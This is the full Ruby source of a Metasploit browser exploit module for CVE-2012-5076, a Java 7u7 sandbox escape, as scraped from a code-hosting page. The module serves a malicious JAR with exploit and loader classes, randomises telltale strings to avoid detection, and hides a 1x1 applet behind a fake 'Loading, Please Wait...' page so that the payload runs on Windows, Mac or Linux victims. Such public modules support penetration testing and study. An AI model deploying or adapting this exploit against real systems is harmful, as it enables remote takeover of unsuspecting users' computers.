Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/multi/browser/java_jre17_glassfish_averagerangestatisticimpl.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::HttpServer::HTML9include Msf::Exploit::EXE1011#include Msf::Exploit::Remote::BrowserAutopwn12#autopwn_info({ :javascript => false })1314def initialize( info = {} )1516super( update_info( info,17'Name' => 'Java Applet AverageRangeStatisticImpl Remote Code Execution',18'Description' => %q{19This module abuses the AverageRangeStatisticImpl from a Java Applet to run20arbitrary Java code outside of the sandbox, a different exploit vector than the one21exploited in the wild in November of 2012. The vulnerability affects Java version227u7 and earlier.23},24'License' => MSF_LICENSE,25'Author' =>26[27'Unknown', # Vulnerability discovery at security-explorations28'juan vazquez' # Metasploit module29],30'References' =>31[32[ 'CVE', '2012-5076' ],33[ 'OSVDB', '86363' ],34[ 'BID', '56054' ],35[ 'URL', 'http://www.oracle.com/technetwork/topics/security/javacpuoct2012-1515924.html' ],36[ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2012-5076' ],37[ 'URL', 'http://www.security-explorations.com/materials/se-2012-01-report.pdf' ]38],39'Platform' => %w{ java linux osx win },40'Payload' => { 'Space' => 20480, 'DisableNops' => true },41'Targets' =>42[43[ 'Generic (Java Payload)',44{45'Platform' => ['java'],46'Arch' => ARCH_JAVA,47}48],49[ 'Windows x86 (Native Payload)',50{51'Platform' => 'win',52'Arch' => ARCH_X86,53}54],55[ 'Mac OS X x86 (Native Payload)',56{57'Platform' => 'osx',58'Arch' => ARCH_X86,59}60],61[ 'Linux x86 (Native Payload)',62{63'Platform' => 'linux',64'Arch' => ARCH_X86,65}66],67],68'DefaultTarget' => 0,69'DisclosureDate' => '2012-10-16'70))71end727374def setup75path = File.join(Msf::Config.data_directory, "exploits", "cve-2012-5076_2", "Exploit.class")76@exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }77path = File.join(Msf::Config.data_directory, "exploits", "cve-2012-5076_2", "B.class")78@loader_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }7980@exploit_class_name = rand_text_alpha("Exploit".length)81@exploit_class.gsub!("Exploit", @exploit_class_name)82super83end8485def on_request_uri(cli, request)86print_status("handling request for #{request.uri}")8788case request.uri89when /\.jar$/i90jar = payload.encoded_jar91jar.add_file("#{@exploit_class_name}.class", @exploit_class)92jar.add_file("B.class", @loader_class)93metasploit_str = rand_text_alpha("metasploit".length)94payload_str = rand_text_alpha("payload".length)95jar.entries.each { |entry|96entry.name.gsub!("metasploit", metasploit_str)97entry.name.gsub!("Payload", payload_str)98entry.data = entry.data.gsub("metasploit", metasploit_str)99entry.data = entry.data.gsub("Payload", payload_str)100}101jar.build_manifest102103send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })104when /\/$/105payload = regenerate_payload(cli)106if not payload107print_error("Failed to generate the payload.")108send_not_found(cli)109return110end111send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })112else113send_redirect(cli, get_resource() + '/', '')114end115116end117118def generate_html119html = %Q|<html><head><title>Loading, Please Wait...</title></head>|120html += %Q|<body><center><p>Loading, Please Wait...</p></center>|121html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@exploit_class_name}.class" width="1" height="1">|122html += %Q|</applet></body></html>|123return html124end125end126127128